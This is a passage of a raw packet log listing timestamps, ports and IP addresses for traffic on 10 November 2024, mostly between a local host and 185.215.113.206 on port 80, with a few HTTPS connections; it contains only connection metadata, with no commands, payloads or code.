Nov 10, 2024 04:55:24.526307106 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526316881 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526319981 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526330948 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526346922 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526350021 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526377916 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526387930 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526387930 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526390076 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526407957 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526427984 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526427984 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526433945 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526443005 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526447058 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526453972 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526458979 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526469946 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526488066 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526510954 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526510954 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526510954 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526521921 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526550055 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526555061 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526555061 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526560068 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526570082 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526599884 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526622057 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526648045 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526658058 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526678085 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526691914 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526695967 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526710033 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526726007 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526726961 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526743889 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526751041 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526765108 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526774883 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526787043 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526787043 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526819944 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526824951 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526837111 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526849031 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526860952 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526868105 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526896954 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526921034 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526928902 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526938915 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526951075 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526971102 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.526978970 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526992083 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.526998997 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527000904 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527019024 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527038097 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527079105 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527087927 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527096033 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527108908 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527120113 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527129889 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527131081 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527154922 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527164936 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527179956 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527192116 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527230024 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527236938 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527281046 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527326107 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527338028 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527359962 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527379036 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527390957 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527391911 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527403116 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527409077 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527424097 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527440071 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527442932 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527442932 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527451992 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527483940 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527486086 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527503967 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527518034 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527518988 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527545929 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527548075 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527559996 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527569056 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527575016 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527600050 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527601004 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527609110 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527622938 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527650118 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527654886 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527654886 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527662992 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527677059 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527693987 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527698994 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527698994 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527720928 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527734041 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527755976 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527755976 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527770042 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527782917 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527802944 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527815104 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527833939 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527847052 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527868032 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527869940 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527884960 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527899981 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527905941 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527921915 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527924061 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527935982 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.527942896 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527982950 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.527987957 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.528009892 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.528021097 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.528034925 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.528048038 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.528052092 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.528064966 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.528101921 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.528228045 CET	443	49832	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:24.528543949 CET	49832	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:24.528692007 CET	443	49835	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.528711081 CET	443	49835	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.528752089 CET	49835	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.528758049 CET	443	49835	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.528773069 CET	443	49835	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.528851986 CET	49835	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.530682087 CET	49832	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:24.530689955 CET	443	49832	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:24.544531107 CET	49853	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:24.544540882 CET	443	49853	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:24.544797897 CET	49853	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:24.545042038 CET	49835	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.545044899 CET	443	49835	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.545461893 CET	49854	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.545475960 CET	443	49854	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.545564890 CET	49854	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.545943975 CET	49853	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:24.545953989 CET	443	49853	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:24.546499968 CET	49854	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:24.546509027 CET	443	49854	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:24.569869995 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.569889069 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.569900990 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.569931984 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.569982052 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641280890 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641309023 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641319036 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641360998 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641360998 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641391039 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641405106 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641405106 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641410112 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641433954 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641458988 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641460896 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641460896 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641472101 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641474009 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641483068 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641495943 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641509056 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641515017 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641515017 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641529083 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641539097 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641551971 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641562939 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641573906 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641577959 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641577959 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641594887 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641614914 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641624928 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641632080 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641643047 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641664028 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641664028 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641680956 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641690016 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641699076 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641704082 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641710043 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641721964 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641731977 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641733885 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641748905 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641769886 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641769886 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641772032 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641782999 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641791105 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641809940 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641829014 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641834974 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641840935 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641855001 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641875029 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641882896 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641882896 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641891003 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641899109 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641902924 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641933918 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641937017 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641944885 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641963959 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641971111 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.641983986 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.641995907 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642009974 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642021894 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642030001 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642030954 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642044067 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642067909 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642076015 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642076015 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642086029 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642098904 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642100096 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642126083 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642129898 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642136097 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642148972 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642163038 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642169952 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642169952 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642188072 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642201900 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642210960 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642220020 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642220020 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642251015 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642258883 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642261982 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642273903 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642296076 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642301083 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642313957 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642319918 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642323971 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642338991 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642344952 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642350912 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642378092 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642386913 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642386913 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642390966 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642401934 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642416000 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642437935 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642437935 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642467022 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642476082 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642488003 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642499924 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642524958 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642537117 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642539978 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642539978 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642580032 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642647028 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642662048 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642672062 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642683983 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642697096 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642719030 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642719030 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642725945 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642736912 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642739058 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642744064 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642766953 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642792940 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642793894 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642793894 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642803907 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642822027 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642838001 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642839909 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642853975 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642863035 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642872095 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642872095 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642874956 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642887115 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642899990 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642911911 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642919064 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642939091 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642939091 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.642954111 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.642983913 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643027067 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643037081 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643048048 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643062115 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643091917 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643098116 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643106937 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643126011 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643143892 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643145084 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643155098 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643167973 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643181086 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643183947 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643183947 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643214941 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643225908 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643249035 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643260956 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643270969 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:24.643281937 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643281937 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:24.643285036 CET	80	49771	185.215.113.206	192.168.2.5
